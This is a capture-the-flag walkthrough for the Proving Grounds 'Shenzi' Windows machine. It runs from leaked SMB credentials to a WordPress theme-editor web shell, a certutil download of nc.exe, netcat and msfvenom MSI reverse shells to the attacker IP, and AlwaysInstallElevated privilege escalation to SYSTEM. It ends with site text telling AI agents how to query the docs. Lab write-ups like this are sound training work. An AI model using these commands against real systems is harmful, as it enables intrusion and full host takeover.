# Shenzi

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.85.55 all`

![](/files/gcuz6z9KBy2bWxo7BYMg)

### Service Enumeration

### SMB (Port 445)

We can list what to see what Sharenames there are.

![](/files/oexqG5BtpJOHzv3t4LoL)

We can then download all the files to see if there are anything useful.

![](/files/DHvp7tUy9tevJMGF4Nf9)

Passwords.txt contains many credentials which we can save for later.

![](/files/Nt0skmi711uZ3tlX3Gca)

Notice that there are WordPress credentials. We can thus run `gobuster` on the webserver to see if there are any interesting directories.

### HTTP (Port 80)

It looks like a basic XAMPP server.

![](/files/StaJhat7cxjlg714GWMB)

We can run `gobuster`.

![](/files/FAn9RL1Yj1uRlxr3z77I)

There is a `phpmyadmin` directory but we can't really access it.

After more digging and clever brute-forcing, I tried `/Shenzi` directory and we get this page.

![](/files/FCidPziZ5PKeM6r3LepJ)

Since we know this is a WordPress site, we can try the /wp-admin/ directory and we get this login page.

![](/files/7LLcJPqu8P53LqInPRHb)

From our earlier enumeration of SMB service, we know that the login credentials are `admin:FeltHeadwallWight357`. We try using these credentials, and we are authenticated.

## Exploit

Here, we can navigate to`Theme Editor` under the `Appearance` tab. In this tab, we are able to modify PHP code.

![](/files/2QKg9c1tGwKKQGy8cAc1)

We copy and paste the source code from here, <https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php>, to the `404.php` file. This would allow us to have access to a web shell whenever we get a 404 error on this site, or if we navigate to `404.php`.&#x20;

Then, we navigate to `/404.php` or any other directory that doesn't exist, and we get our web shell.

![](/files/OXrkq46aMJ50Z5NPHaWS)

Next, let's transfer `nc.exe` to the target machine so that we can use it to gain a reverse shell.

`cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe`

![](/files/xEdrA6wXPr4vvb08sf3p)

![](/files/6gkWS3gzFggfDUGPryra)

![](/files/hQJ1MAoU7DYuikFKtraY)

Next, let's get a reverse shell.

We use the following command in our PHP Web Shell:

`nc.exe -e cmd 192.168.49.85 443`

![](/files/I9AzeaI0bCQLTrjl02DH)

## Privesc

Next, we can transfer winPEAS onto the target machine and run it.

From winPEAS, we notice these 2 registers are **enabled** (value is **0x1**). This means users of any privilege can **install** (execute) **`*.msi`** files as NT AUTHORITY\\**SYSTEM**.

Credits - <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated>&#x20;

![](/files/Qmf8wzM8blQUPBBe6foW)

Let's generate a `.msi` reverse shell file first.

`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi`

![](/files/sgL4a2Ijr7dNQIi0yIIK)

After transferring the file and running it, we get SYSTEM.

![](/files/fawgeNpSuGhVwoUP5Sg9)

![](/files/ePhPLfvlmQj6UZQLrqf7)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infintesky.gitbook.io/pentesting/proving-grounds/get-to-work/windows/shenzi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.